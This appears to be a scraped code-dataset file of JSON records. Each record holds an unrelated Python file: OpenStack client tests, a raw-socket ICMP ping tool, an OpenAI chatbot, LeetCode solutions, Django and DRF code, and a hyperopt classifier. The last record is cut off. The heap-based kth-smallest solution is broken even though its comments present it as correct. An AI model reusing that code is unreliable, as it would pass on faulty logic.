output)\n\n def test_find_by_int_name(self):\n output = utils.find_resource(self.manager, 9876)\n self.assertEqual(self.manager.get('5678'), output)\n\n\nclass ResourceTest(testtools.TestCase):\n 
def setUp(self):\n super(ResourceTest, self).setUp()\n self.orig___init__ = base.Resource.__init__\n\n def tearDown(self):\n super(ResourceTest, self).tearDown()\n base.Resource.__init__ = self.orig___init__\n\n def test___init__(self):\n manager = mock.Mock()\n manager.write_to_completion_cache = mock.Mock(return_value=None)\n\n info_ = {}\n robj = base.Resource(manager, info_)\n self.assertEqual(0, manager.write_to_completion_cache.call_count)\n\n info_ = {\"id\": \"id-with-less-than-36-char\"}\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(0, manager.write_to_completion_cache.call_count)\n\n id_ = \"id-with-36-char-\"\n for i in range(36 - len(id_)):\n id_ = id_ + \"-\"\n info_ = {\"id\": id_}\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(1, manager.write_to_completion_cache.call_count)\n\n info_[\"name\"] = \"test-human-id\"\n # Resource.HUMAN_ID is False\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertIsNone(robj.human_id)\n self.assertEqual(2, manager.write_to_completion_cache.call_count)\n\n # base.Resource.HUMAN_ID = True\n info_[\"HUMAN_ID\"] = True\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"id\"], robj.id)\n self.assertEqual(info_[\"name\"], robj.human_id)\n self.assertEqual(4, manager.write_to_completion_cache.call_count)\n\n def test_human_id(self):\n manager = mock.Mock()\n manager.write_to_completion_cache = mock.Mock(return_value=None)\n\n info_ = {\"name\": \"test-human-id\"}\n robj = base.Resource(manager, info_)\n self.assertIsNone(robj.human_id)\n\n info_[\"HUMAN_ID\"] = True\n robj = base.Resource(manager, info_)\n self.assertEqual(info_[\"name\"], robj.human_id)\n robj.name = \"new-human-id\"\n self.assertEqual(\"new-human-id\", robj.human_id)\n\n def get_mock_resource_obj(self):\n base.Resource.__init__ = mock.Mock(return_value=None)\n robj = base.Resource()\n robj._loaded = False\n return robj\n\n def test__add_details(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n self.assertEqual(info_[\"name\"], robj.name)\n self.assertEqual(info_[\"test_attr\"], robj.test_attr)\n\n def test___getattr__(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n self.assertEqual(info_[\"test_attr\"], robj.__getattr__(\"test_attr\"))\n\n # TODO(dmakogon): looks like causing infinite recursive calls\n # robj.__getattr__(\"test_non_exist_attr\")\n\n def test___repr__(self):\n robj = self.get_mock_resource_obj()\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._add_details(info_)\n\n expected = \"\"\n self.assertEqual(expected, robj.__repr__())\n\n def test_get(self):\n robj = self.get_mock_resource_obj()\n manager = mock.Mock()\n manager.get = None\n\n robj.manager = object()\n robj._get()\n\n manager = mock.Mock()\n robj.manager = mock.Mock()\n\n robj.id = \"id\"\n new = mock.Mock()\n new._info = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj.manager.get = mock.Mock(return_value=new)\n robj._get()\n self.assertEqual(\"test-human-id\", robj.name)\n self.assertEqual(5, robj.test_attr)\n\n def test___eq__(self):\n robj = self.get_mock_resource_obj()\n other = base.Resource()\n\n info_ = {\"name\": \"test-human-id\", \"test_attr\": 5}\n robj._info = info_\n other._info = {}\n self.assertFalse(robj.__eq__(other))\n\n robj.id = 
\"rid\"\n other.id = \"oid\"\n self.assertFalse(robj.__eq__(other))\n\n other.id = \"rid\"\n self.assertTrue(robj.__eq__(other))\n\n # not instance of the same class\n other = mock.Mock()\n self.assertEqual(robj.__eq__(other), NotImplemented)\n\n def test_is_loaded(self):\n robj = self.get_mock_resource_obj()\n robj._loaded = True\n self.assertTrue(robj.is_loaded)\n\n robj._loaded = False\n self.assertFalse(robj.is_loaded)\n","repo_name":"openstack/python-troveclient","sub_path":"troveclient/tests/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":16696,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"38"}
+{"seq_id":"32918461565","text":"#!/usr/bin/env python3\r\n\r\nimport argparse\r\nimport json\r\n\r\nfrom changes import MixtapeChanges\r\nfrom mixtapes import NaiveMixtape, OptimizedMixtape\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser('Apply some changes')\r\n parser.add_argument('-i', '--input', dest='input_file', required=True, help='Input filename')\r\n parser.add_argument('-o', '--changes', dest='changes_file', required=True, help='Changes filename')\r\n return parser.parse_args()\r\n\r\n\r\ndef load_files(arguments):\r\n in_file = json.load(open(arguments.input_file))\r\n change_file = json.load(open(arguments.changes_file))\r\n return in_file, change_file\r\n\r\n\r\nif __name__ == '__main__':\r\n args = get_args()\r\n input_file, changes_file = load_files(args)\r\n\r\n mixtape = NaiveMixtape(input_file)\r\n mixtape_changes = MixtapeChanges(changes_file)\r\n\r\n mixtape.apply(mixtape_changes)\r\n output = json.dumps(mixtape.mixtape, indent=4)\r\n print(output)\r\n","repo_name":"KenAdamson/highspot-test","sub_path":"apply.py","file_name":"apply.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"30737934273","text":"\"\"\"\nKth smallest element in a row-wise and column-wise sorted 2D array\n\nGiven an n*n matrix where every row and column is sorted in non-decreasing order. \nFind the kth smallest element in the given 2D array.\n\nExample, \n\nInput:k = 3 and array =\n 10, 20, 30, 40\n 15, 25, 35, 45\n 24, 29, 37, 48\n 32, 33, 39, 50 \nOutput: 20\nExplanation: The 3rd smallest element is 20 \n\nInput:k = 7 and array =\n 10, 20, 30, 40\n 15, 25, 35, 45\n 24, 29, 37, 48\n 32, 33, 39, 50 \nOutput: 30\n\nApproach:\n\nThe idea is to find the kth minimum element. Each row and each column is sorted. So it can be\nthough as C sorted lists and the lists have to be merged into a single list, the kth\nelement of the list has to be found out. So the approach is similar, the only difference is\nthe kth element is found the loop ends.\n\nAlgorithm:\n1. Use min heap - create min-heap to store the elements\n2. Traverse the first row from start to end and build a min heap of elements from first row.\nA heap entry also stores row number and column number\n3. Now run a loop k times to extract min element from heap in each iteration\n4. Get minimum element or root from Min-Heap.\n5. Find row number and column number of the minimum element.\n6. Replace root with next element from same column and min-heapify the root.\n7. print the last extracted element, which is the kth minimum element.\n\n\nTime Complexity: \n\nThe solution involves following steps. \nBuilding a min-heap which takes O(n) time\nHeapify k times which takes O(k Logn) time.\n\nSpace Complexity: \nO(R), where R is the length of a row, as the Min-Heap stores one row at a time.\nThis code can be optimized to build a heap of size k when k is smaller than n. \nIn that case, the kth smallest element must be in first k rows and k columns. \n\nThis code can be optimized to build a heap of size k when k is smaller than n. In that case,\nthe kth smallest element must be in first k rows and k columns.\n\n\"\"\"\n\n# program fro kth largest element in a 2d array sorted row-wise and column-wise\nfrom sys import maxsize\n\n# A structure to store an entry of heap. The entry contains a value from 2D array, row and\n# column numbers of the value\n\nclass HeapNode:\n def __init__(self, val, r, c):\n self.val =val # value to be stored\n self.r = r # Row number of value in 2D array\n self.c = c # Column number of value in 2D array\n\n# A utility function to minheapify the node harr[i] of a heap stored in harr[]\ndef minHeapify(harr, i, heap_size):\n l = i * 2 + 1\n r = i * 2 + 2\n smallest = i\n \n if l < heap_size and harr[l].val < harr[i].val:\n smallest = l\n\n if r < heap_size and harr[r].val == 0:\n minHeapify(harr, i, heap_size)\n # minHeapify(harr, i, n)\n i -= 1\n\n# This function returns kth smallest element in a 2D array mat[][]\ndef kthSmallest(mat, n, k):\n \n # k must be greater than 0 and smaller than n*n\n if k > 0 and n*n < k:\n return maxsize\n \n # create a min heap of elements from first row of 2D array\n harr = [0] * n\n \n for i in range(n):\n harr[i] = HeapNode(mat[0][i], 0, i)\n \n # buildHeap(harr, n)\n\n hr = HeapNode(0, 0, 0)\n\n for i in range(k):\n \n # Get current heap root\n hr =harr[0]\n\n # Get next value from column of root's value. 
If the value stored at root was last \n # value in its column, then assign INFINITE as next value\n \n if(hr.r < n - 1):\n nextval = mat[hr.r + 1][hr.c]\n\n else:\n maxsize\n\n # update heap root with next value\n harr[0] = HeapNode(nextval, hr.r + 1, hr.c)\n\n # heapify root\n minHeapify(harr, 0, n)\n\n # Return the value at last extracted root\n return hr.val\n \nif __name__==\"__main__\":\n mat = [[10, 20, 30, 40],\n [15, 25, 35, 45],\n [25, 29, 37, 48],\n [32, 33, 39, 50]]\n print(\"7th smallest element is\", kthSmallest(mat, 4, 7))\n\n\n# expected output: 7th smallest element is 30\n\n\n\"\"\"\nBinary Search over the Range:\n\nThis approach uses binary search to iterate over possible solutions. We know that\n1. answer >= mat[0][0]\n2. answer <= mat[N-1][N-1]\n\nSo, we do a binary search on this range and in each iteration determine the no of elements\ngreater than or equal to our current middle element. The elements greater than or equal to \ncurrent element can be found in O(log(n)) time using binary search.\n\"\"\"\n# This returns count of elements in matrix less than or equal to num\ndef getElementsGreaterThanOrEqual(num, n, mat):\n ans = 0\n for i in range(n):\n # if num is less than the first element then no more element in matrix further are \n # less than or equal to num\n if(mat[i][0] > num):\n return ans\n # if num is greater than last element, it is greater than all elements in that row\n if(mat[i][n-1] <= num):\n ans += n\n continue\n # This contain the col inde of last element in matrix less than or equal to num\n greaterThan = 0\n jump = n // 2\n while(jump >= 1):\n while(greaterThan + jump < n and mat[i][greaterThan + jump] <= num):\n greaterThan += jump\n jump //=2\n\n ans += greaterThan +1\n return ans\n\n# returns kth smallest index in the matrix\ndef kthSmallest(mat, n, k):\n # We know the answer lies between the first and the last element, so, do a binary search\n # on answer based on the number of elements our current elements is greater than \n # the elements in the matrix\n l, r =mat[0][0], mat[n-1][n-1]\n\n while(l <= r):\n mid = l + (r -l) // 2\n greaterThanOrEqualMid = getElementsGreaterThanOrEqual(mid, n, mat)\n if(greaterThanOrEqualMid >= k):\n r = mid -1\n else:\n l = mid +1\n return l\n\n\nn = 4\nmat = [[10, 20, 30, 40],[15, 25, 35, 45],[25, 29, 37, 48],[32, 33, 39, 50]]\nprint(f\"7th smallest element is {kthSmallest(mat, 4, 7)}\")\n\n\"\"\"\nComplexity Analysis\n\nTime Complexity : O( y * n*logn)\nWhere y = log( abs(Mat[0][0] - Mat[n-1][n-1]) )\nWe call the getElementsGreaterThanOrEqual function log ( abs(Mat[0][0] – Mat[n-1][n-1]) ) times\nTime complexity of getElementsGreaterThanOrEqual is O(n logn) since there we do binary search n \ntimes.\n\nSpace Complexity: O(1)\n\nUSING ARRAY:\n------------\nWe will make a new array and will copy all the contents of matrix in this array.After that we will\nsort that array and find kth smallest element.This will be so easier.\n\n\n\"\"\"\n\ndef kth_smallest_arr(mat, n, k):\n\n a =[0 for i in range(n*n)]\n v = 0\n\n for i in range(n):\n for j in range(n):\n a[v] = mat[i][j]\n v +=1\n \n a.sort()\n result =a[k -1]\n return result\n\nmat = [ [ 10, 20, 30, 40 ],\n [ 15, 25, 35, 45 ],\n [ 25, 29, 37, 48 ],\n [ 32, 33, 39, 50 ] \n ]\n\nres = kthSmallest(mat, 4, 7)\n \nprint(\"7th smallest element is \"+ 
str(res))","repo_name":"Chemokoren/Algorithms-1","sub_path":"GFG/Arrays/OrderStatistics/kth_smallest_element_in_row_wise_and_column_wise_sorted_2D_array_set.py","file_name":"kth_smallest_element_in_row_wise_and_column_wise_sorted_2D_array_set.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"14098637839","text":"import xml.etree.ElementTree as ET\nimport csv\ntree = ET.parse(r\"d:\\My project\\BlogApp\\BlogApp\\fedility_service\\sample.xml\")\nprint(\"----------------------------\")\nroot = tree.getroot()\nprint(\"...................\",root)\n \nResident_data = open(r'd:\\My project\\BlogApp\\BlogApp\\fedility_service\\output.csv', 'w')\n \ncsvwriter = csv.writer(Resident_data)\nresident_head = []\ncount = 0\nfor member in root.find('ReportData'):\n print(member)\n csvwriter.writerow([member.text, \"empty\"])\n \nResident_data.close()\n\n\n\n","repo_name":"Chinjumerinamonachan/BlogApp","sub_path":"fedility_service/xml_csv_conversion.py","file_name":"xml_csv_conversion.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"36707159851","text":"import openai\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\n\ndef get_bot_response(message):\n response = openai.Completion.create(\n model=\"text-davinci-003\",\n prompt=message,\n temperature=0.5,\n max_tokens=60,\n top_p=1.0,\n frequency_penalty=0.5,\n presence_penalty=0.0,\n stop=[\"You:\"]\n )\n # return the text of the completion\n return response.choices[0].text.strip()\n\n\ndef chat_loop():\n print(\"Hal: Hello! How can I assist you today?\")\n\n while True:\n user_message = input(\"You: \")\n if user_message.lower() in [\"quit\", \"bye\", \"goodbye\", \"see you\"]:\n print(\"Hal: Goodbye!\")\n break\n else:\n bot_response = get_bot_response(user_message)\n print(f\"Hal: {bot_response}\")\n\n\nif __name__ == \"__main__\":\n chat_loop()\n","repo_name":"kamephis/deeptalk","sub_path":"deeptalk.py","file_name":"deeptalk.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"44781278338","text":"import socket\nimport struct\nimport argparse\nimport time\nimport threading\n\nICMP_ECHO_REQUEST = 8\n\ndef calculate_checksum(packet):\n checksum = 0\n for i in range(0, len(packet), 2):\n checksum += (packet[i] << 8) + packet[i + 1]\n checksum = (checksum >> 16) + (checksum & 0xFFFF)\n return ~checksum & 0xFFFF\n\ndef send_ping_request(dest_ip):\n icmp_checksum = 0\n icmp_id = 1 \n icmp_seq = 1\n\n icmp_header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, icmp_checksum, icmp_id, icmp_seq)\n data = b\"abcdefghijklmnopqrstuvwabcdefghi\"\n\n\n icmp_checksum = calculate_checksum(icmp_header + data)\n icmp_header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(icmp_checksum), icmp_id, icmp_seq)\n\n try:\n \n raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n raw_socket.sendto(icmp_header + data, (dest_ip, 0))\n \n # ICMP yanıtını al\n recv_packet, addr = raw_socket.recvfrom(1024)\n round_trip_time = (time.time() - start_time) * 1000\n return round_trip_time, addr[0]\n except socket.timeout:\n return None, None\n\ndef ping_host(host, timeout):\n global start_time\n start_time = time.time()\n try:\n dest_ip = socket.gethostbyname(host)\n while not stop_event.is_set():\n response_time, dns_ip = send_ping_request(dest_ip)\n if response_time is not None:\n if dns_ip:\n print(f\"{host} ({dns_ip}) Ping successfully sent to the address. Ping time: {response_time} ms\")\n else:\n print(f\"{host} Ping successfully sent to the address. Ping time: {response_time} ms\")\n else:\n print(f\"{host} An error occurred while pinging the address.\")\n time.sleep(1)\n except Exception as e:\n print(f\"{host} An error occurred while pinging the address: {str(e)}\")\n\ndef ping_hosts_from_file(file_path, timeout):\n try:\n with open(file_path, \"r\") as file:\n targets = file.read().splitlines()\n except FileNotFoundError:\n print(f\"{file_path} File not found.\")\n return\n except Exception as e:\n print(f\"An error occurred while opening the file: {str(e)}\")\n return\n\n for target in targets:\n ping_thread = threading.Thread(target=ping_host, args=(target, timeout))\n ping_thread.start()\n\ndef main():\n global stop_event\n stop_event = threading.Event()\n\n parser = argparse.ArgumentParser(description=\"Tool used for ICMP ping to IP addresses.\")\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-u\", \"--url\", help=\"Pings an IP or domain address\", type=str)\n group.add_argument(\"-l\", \"--list\", help=\"Pings IP or domain addresses from a file\", type=str)\n parser.add_argument(\"-t\", \"--timeout\", help=\"Maximum timeout for ping responses (seconds)\", type=float, default=2)\n try:\n args = parser.parse_args()\n except KeyboardInterrupt:\n stop_event.set()\n return\n\n if args.url:\n ping_host(args.url, args.timeout)\n\n if args.list:\n ping_hosts_from_file(args.list, args.timeout)\n\n try:\n while not stop_event.is_set():\n pass\n except KeyboardInterrupt:\n stop_event.set()\n\nif __name__ == \"__main__\":\n main()","repo_name":"sefabasnak/MULTIPLE-PING","sub_path":"multiple-ping.py","file_name":"multiple-ping.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72503382832","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Apr 13、4\n\n@author: xiaoheizai\n\"\"\"\n\n'''\n给定一个二维的矩阵,包含 'X' 和 'O'(字母 O)。\n\n找到所有被 'X' 围绕的区域,并将这些区域里所有的 'O' 用 'X' 填充。\n\n示例:\n\nX X X X\nX O O X\nX X O X\nX O X X\n运行你的函数后,矩阵变为:\n\nX X X X\nX X X X\nX X X X\nX O X X\n解释:\n\n被围绕的区间不会存在于边界上,换句话说,任何边界上的 'O' 都不会被填充为 'X'。 \n任何不在边界上,或不与边界上的 'O' 相连的 'O' 最终都会被填充为 'X'。\n如果两个元素在水平或垂直方向相邻,则称它们是“相连”的。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/surrounded-regions\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\n\nclass UnionFind(object):\n def __init__(self, n):\n self.uf = [-1 for i in range(n)]\n \n def find(self, node):\n temp = node\n while self.uf[node] > 0:\n node = self.uf[node]\n \n while self.uf[temp] > 0:\n self.uf[temp], temp = node, self.uf[temp]\n \n return node\n \n def union(self, node1, node2):\n root1 = self.find(node1)\n root2 = self.find(node2)\n \n if root1 == root2:\n return\n if self.uf[root1] < self.uf[root2]:\n self.uf[root1] += self.uf[root2]\n self.uf[root2] = root1\n else:\n self.uf[root2] += self.uf[root1]\n self.uf[root1] = root2\n \n def is_connect(self, node1, node2):\n return self.find(node1) == self.find(node2)\n\nclass Solution(object):\n def solve(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: None Do not return anything, modify board in-place instead.\n \"\"\"\n row = len(board)\n if row == 0:\n return board\n col = len(board[0])\n union_table = UnionFind(row * col + 1)\n virtual_node = row * col\n \n for i in range(row):\n for j in range(col):\n index = i * col + j\n if i == 0 or j == 0 or i == row -1 or j == col - 1:\n if board[i][j] == \"O\":\n union_table.union(index, virtual_node)\n if board[i][j] == \"O\":\n if i < row - 1 and board[i+1][j] == \"O\":\n index_down = (i+1) * col + j\n union_table.union(index, index_down)\n if j < col - 1 and board[i][j+1] == \"O\":\n index_right = index + 1\n union_table.union(index, index_right)\n \n for i in range(row):\n for j in range(col):\n index = i * col + j\n if i == 0 or j ==0 or i == row - 1 or j == col - 1:\n continue\n else:\n if not union_table.is_connect(index, virtual_node):\n board[i][j] = \"X\"","repo_name":"xiaoheizai/python_for_leetcode","sub_path":"并查集/130 被围绕的区域.py","file_name":"130 被围绕的区域.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"35589093729","text":"# This module receives and processes the bar data\n# First draft 2016/10/3\n# This draft 2016/10/6\n\n\nimport pandas as pd\nimport datetime\n\n\n# The sample data is a stock in HS300 taken randomly from Tushare \nclass DataHandler2(object):\n\n def __init__(self, path):\n self.path = path\n self.data = pd.read_csv(self.path)\n self.data.returni = []\n for i in range(1, len(self.data)):\n self.data.returni.append(\n (self.data.close[i] - self.data.close[i - 1]) / self.data.close[i - 1])\n","repo_name":"FreeA7/financial_kmeans","sub_path":"Problem2_10_03/datahandler2.py","file_name":"datahandler2.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20771798845","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ktapp', '0010_film_directors_cache'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MessageCountCache',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('number_of_messages', models.PositiveIntegerField(default=0)),\n ('owned_by', models.ForeignKey(related_name='owned_message_count', to=settings.AUTH_USER_MODEL)),\n ('partner', models.ForeignKey(related_name='partner_message_count', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='messagecountcache',\n unique_together=set([('owned_by', 'partner')]),\n ),\n migrations.AddField(\n model_name='ktuser',\n name='number_of_messages',\n field=models.PositiveIntegerField(default=0),\n preserve_default=True,\n ),\n ]\n","repo_name":"cu2/KT","sub_path":"ktapp/migrations/0011_auto_20150902_1833.py","file_name":"0011_auto_20150902_1833.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"38"}
+{"seq_id":"12647321031","text":"from hpsklearn import HyperoptEstimator, any_sparse_classifier, tfidf,liblinear_svc\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn import metrics\nfrom hyperopt import tpe\nimport numpy as np\nfrom sklearn.metrics import accuracy_score,classification_report\n# Download the data and split into training and test sets\n\nimport pandas as pd, numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer,HashingVectorizer\nfrom sklearn import svm\nimport logging\nimport numpy as np\nimport time\nimport os\nimport pickle # pickle模块2\nimport logging\nimport os\nimport sys\nimport json\nimport datetime\nfrom collections import defaultdict\n\ncurrentUrl = os.path.dirname(__file__)\nmost_parenturl = os.path.abspath(os.path.join(currentUrl, os.pardir))\nm_p, m_c = os.path.split(most_parenturl)\nwhile 'xunfei' not in m_c:\n m_p, m_c = os.path.split(m_p)\n\nsys.path.append(os.path.join(m_p, m_c))\nfrom class_model.load_data import load_data\nfrom sklearn.metrics import accuracy_score\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\n# 1281312322\ncolumn = \"word_seg\"\nproject_path=\"/data/tanggp/xun_class//aichallenge/\"\ntest_path=os.path.join(project_path,\"apptype_train.test_jieba_json\")\ntrain_path=os.path.join(project_path,\"apptype_train.train_jieba_json\")\npred_path=os.path.join(project_path,\"app_desc.jieba_json\")\nlabel_dic = {}\nlabel_num = 0\nt = time.time()\n\nimport json\n\nfrom sklearn.calibration import CalibratedClassifierCV\n\ndef get_data_set(flie):\n global label_num\n with open(flie) as f:\n lines = f.readlines()\n data_x = []\n data_y = []\n apps=[]\n for li in lines:\n li=json.loads(li)\n text=li.get(\"jieba\")\n label1=li.get(\"label\",\"no\") #label_1st\n app=li.get(\"app\")\n apps.append(app)\n if label1 not in label_dic.keys():\n label_dic[label1] = label_num\n label_num += 1\n\n label = label_dic.get(label1)\n\n data_x.append(text)\n data_y.append(label)\n assert len(data_x) == len(data_y)\n return data_x, np.array(data_y).astype(int),apps\n\n\ndef svm_train():\n # train_x, train_y,apps = get_data_set(train_path)\n # test_x, test_y,apps = get_data_set(test_path)\n # pred_x,_,apps=get_data_set(pred_path)\n train_x, train_y, test_x, test_y, pred_x, apps, label_dic = load_data()\n # with open(CHANNEL_MODEL + 'svm_label.pkl', 'wb') as f:\n # pickle.dump(label_dic, f)\n\n logging.info('train {} test{}'.format(len(train_x), len(test_x)))\n t=time.time()\n logging.info(\"===\"*8)\n\n estim = HyperoptEstimator(classifier=liblinear_svc('clf'),max_evals=10,\n preprocessing=[\n tfidf('tfidf',ngram_range=(1, 4), min_df=10, max_df=0.9, use_idf=1, smooth_idf=1, sublinear_tf=1)],\n algo=tpe.suggest, trial_timeout=1200,refit=False)\n logging.info(estim)\n estim.fit(train_x, train_y)\n best_model=estim.best_model()\n\n logging.info(best_model)\n learner=best_model['learner']\n preprocs=best_model['preprocs'][0]\n\n lin_clf = learner\n lin_clf = CalibratedClassifierCV(lin_clf)\n data_set=train_x+test_x+pred_x\n preprocs.fit_transform(data_set)\n trn_term_doc=preprocs.transform(train_x)\n lin_clf.fit(trn_term_doc, train_y)\n\n test_term_doc = preprocs.transform(test_x)\n test_preds_prob = lin_clf.predict_proba(test_term_doc)\n test_preds_=lin_clf.predict(test_term_doc)\n logging.info('accuracy_score {} top1 test\\n {}'.format(accuracy_score(test_y, test_preds_),\n classification_report(test_y,\n test_preds_)))\n test_preds=[]\n for prob in 
test_preds_prob:\n test_preds.append(list(prob.argsort()[-2:][::-1]))\n\n test_preds_ = []\n for rea, tes in zip(test_y, test_preds):\n prd = tes[0]\n for te in tes:\n if rea == te:\n prd = te\n test_preds_.append(prd)\n logging.info('accuracy_score {} top2 test\\n {}'.format(accuracy_score(test_y, test_preds_),\n classification_report(test_y,\n test_preds_)))\n\n\n #logging.info(estim.fit().score(test_x, test_y))\n # <>\n #logging.info(estim.best_model())\n # <>\n\n\n\ndef svm_pred():\n logging.info('pred')\n test_x, test_y = get_data_set(pred_path)\n with open(project_path + 'tfidf.pkl', 'rb') as f:\n vec = pickle.load(f)\n\n test_term_doc = vec.transform(test_x)\n\n with open(project_path + 'svm_model.pkl', 'rb') as f:\n lin_clf = pickle.load(f)\n\n test_preds = lin_clf.predict(test_term_doc)\n\n from sklearn.metrics import confusion_matrix, classification_report\n\n logging.info('\\n {}'.format(classification_report(test_y, test_preds)))\n\nif __name__ == \"__main__\":\n svm_train()\n #svm_pred()\n\n","repo_name":"godkillok/xunfei","sub_path":"class_model/hyper.py","file_name":"hyper.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20162960457","text":"from rest_framework import serializers\n\nfrom loads.models import Load, LoadTruck, Location, Truck\n\n\nclass TruckSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for update Truck.\"\"\"\n location = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n\n class Meta:\n model = Truck\n fields = ('id', 'uid', 'location', 'capacity')\n read_only_fields = ('uid', 'capacity')\n\n\nclass LoadUpdateSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for update Load.\"\"\"\n pick_up = serializers.SlugRelatedField(\n read_only=True,\n slug_field='zip',\n )\n delivery = serializers.SlugRelatedField(\n read_only=True,\n slug_field='zip',\n )\n\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'weight', 'description')\n\n\nclass LoadBaseSerializer(serializers.ModelSerializer):\n \"\"\"Base serializer for load.\"\"\"\n pick_up = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n delivery = serializers.SlugRelatedField(\n queryset=Location.objects.all(),\n slug_field='zip',\n )\n\n\nclass LoadCreateSerializer(LoadBaseSerializer):\n \"\"\"Serializer for create Load.\"\"\"\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'weight', 'description')\n\n\nclass LoadListSerializer(LoadBaseSerializer):\n \"\"\"Serializer for list view of Load.\"\"\"\n near_trucks = serializers.IntegerField()\n\n class Meta:\n model = Load\n fields = ('id', 'pick_up', 'delivery', 'near_trucks')\n\n\nclass TruckDistanceSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for truck - distance.\"\"\"\n truck = serializers.SlugRelatedField(\n slug_field='uid',\n read_only=True\n )\n\n class Meta:\n fields = ('truck', 'distance')\n model = LoadTruck\n\n\nclass LoadRetrieveSerializer(LoadBaseSerializer):\n \"\"\"Serializer for retrieve Load.\"\"\"\n trucks = TruckDistanceSerializer(many=True)\n\n class Meta:\n model = Load\n fields = (\n 'id', 'pick_up', 'delivery', 'weight', 'description', 'trucks'\n )\n","repo_name":"KuzenkovAG/truck_service","sub_path":"truck_service/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22482281238","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# =============================================================================\n# Imports & Function definitions\n# =============================================================================\nfrom dotter.models import DotterModel\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# =============================================================================\n# Parameters\n# =============================================================================\n\ndef test_vegetation():\n \"\"\"\n testcase with vegetation growth\n \"\"\"\n deltabeek = DotterModel('tests/testcases/vegetation/config.ini')\n deltabeek.run()\n\ndef test_backwater():\n \"\"\"\n Tests whether the numerical approximation tends to the equilibrium\n \"\"\"\n deltabeek = DotterModel('tests/testcases/backwater/config.ini')\n\n # The accuracy of the numerical resolution depends on the h_resolution\n deltabeek.grid.h_resolution = 50\n deltabeek.grid.max_depth = 5\n deltabeek.grid.generate_grid()\n\n # Equilibrium depth\n depth = 1.568138\n\n # Check whether above depth is equilibrium\n h = deltabeek.grid.bedlevel[0] + depth\n A = deltabeek.grid.wet_area[0](h)\n R = deltabeek.grid.hydraulic_radius[0](h)\n i = deltabeek.grid.bedslope[0]\n C = R ** (1 / 6.) / 0.04\n\n assert(np.abs(3.50 - A * C * np.sqrt(R * i)) < 0.001)\n\n deltabeek.run(timesteps=[deltabeek.grid.time[0]])\n error = np.abs(deltabeek.output.waterdepth[0][0] - depth)\n assert (error < 